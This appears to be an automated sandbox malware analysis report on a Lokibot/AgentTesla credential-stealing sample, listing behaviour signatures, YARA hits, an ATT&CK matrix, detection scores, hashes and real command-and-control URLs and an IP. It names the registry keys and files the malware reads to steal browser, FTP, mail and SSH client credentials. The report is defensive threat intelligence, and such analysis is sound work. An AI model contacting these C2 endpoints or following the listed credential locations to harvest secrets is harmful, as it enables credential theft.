Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Queries volume information: C:\Users\user\AppData\Roaming\Xzacmv.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\schtasks.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Xzacmv.exe.3aab850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Xzacmv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Xzacmv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Xzacmv.exe.3ac5870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: oAUBqI6vQ7.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Xzacmv.exe PID: 8160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Xzacmv.exe PID: 4900, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000009.00000002.2349385278.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: oAUBqI6vQ7.exe PID: 8120, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: PopPassword		15_2_0040D069
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: SmtpPassword		15_2_0040D069

Source: Yara match	File source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Xzacmv.exe.3aab850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Xzacmv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Xzacmv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Xzacmv.exe.3ac5870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 Scheduled Task/Job	111 Process Injection	1 Masquerading	2 OS Credential Dumping	131 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	2 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
oAUBqI6vQ7.exe	82%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
oAUBqI6vQ7.exe	82%	Virustotal		Browse
oAUBqI6vQ7.exe	100%	Avira	HEUR/AGEN.1306657
oAUBqI6vQ7.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Xzacmv.exe	100%	Avira	HEUR/AGEN.1306657
C:\Users\user\AppData\Roaming\Xzacmv.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Xzacmv.exe	82%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Source	Detection	Scanner	Label	Link
http://94.156.177.41/simple/five/fre.php	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	false		high
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
http://alphastand.top/alien/fre.php	false		high
http://94.156.177.41/simple/five/fre.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	oAUBqI6vQ7.exe, 00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp, Xzacmv.exe, 0000000A.00000002.1477049418.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ibsensoftware.com/	Xzacmv.exe, Xzacmv.exe, 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.177.41	unknown	Bulgaria		43561	NET1-ASBG	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588296
Start date and time:	2025-01-10 23:38:29 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	oAUBqI6vQ7.exe renamed because original name is a hash value
Original Sample Name:	72d3358ea74f770930e44d382a00387f1451399ef01a513d11ef80ba2f9da653.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@23/18@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 282 Number of non-executed functions: 18
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 184.28.90.27, 4.245.163.56
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:39:24	API Interceptor	101x Sleep call for process: oAUBqI6vQ7.exe modified
17:39:26	API Interceptor	48x Sleep call for process: powershell.exe modified
17:39:30	API Interceptor	1x Sleep call for process: Xzacmv.exe modified
17:40:14	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified
22:39:29	Task Scheduler	Run new task: Xzacmv path: C:\Users\user\AppData\Roaming\Xzacmv.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94.156.177.41	Quotation2025-0107pdf.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/mars/five/fre.php
	ZsRFRjkt9q.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/alpha/five/fre.php
	0yWVteGq5T.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/simple/five/fre.php
	CLOSURE DATE FOR THE YEAR.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/kings/five/fre.php
	Order84746.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/davinci/five/fre.php
	FVR-N2411-07396.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/soja/five/fre.php
	Scan copy.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/simple/five/fre.php
	file.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.41/simple/five/fre.php
	stthigns.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NET1-ASBG	IpykYx5iwz.exe	Get hash	malicious	Remcos, GuLoader	Browse	94.156.177.164
	QUOTATION-9044456778.pdf (83kb).com.exe	Get hash	malicious	PureLog Stealer, Quasar	Browse	94.156.177.117
	Fantazy.i486.elf	Get hash	malicious	Unknown	Browse	95.87.199.40
	Fantazy.x86_64.elf	Get hash	malicious	Unknown	Browse	93.123.77.220
	Kloki.arm7.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	Kloki.m68k.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	Kloki.x86_64.elf	Get hash	malicious	Unknown	Browse	83.222.189.67
	Kloki.x86.elf	Get hash	malicious	Unknown	Browse	83.222.190.214
	Kloki.arm4.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	Kloki.spc.elf	Get hash	malicious	Unknown	Browse	83.222.191.90

Process:	C:\Users\user\AppData\Roaming\Xzacmv.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\oAUBqI6vQ7.exe.log

Download File

Process:	C:\Users\user\Desktop\oAUBqI6vQ7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.380747059108785
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoULF+gZ9tK8NPZHUxL7u1iMuge//8PUyus:lGLHyIFKEDZ2KRHWLOug8s
MD5:	1E309166D49539BBAC8935A68D3A1CA3
SHA1:	E78808BFE3A392DD22EF7069D48A2ADB2539EC35
SHA-256:	1799F056752C4FDF2895B748473367E190C32F55A5209E2E0E55DE53DEBFFB40
SHA-512:	9055D03562E3A25292CBE0545E123911FB89B2A04E0CDFBB00333CF9B9DFF8F817135F0AFFEF2B57A73B6308D6B6919E1AB2BA656D19CFC16056D4539CF3940B
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...\|...........System.Configuration4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5uak53xd.kry.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bliiyspd.e3m.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzhiysip.lt2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fyhrxntg.fcz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gpdcvl1v.gan.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qxfbiqfc.eia.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
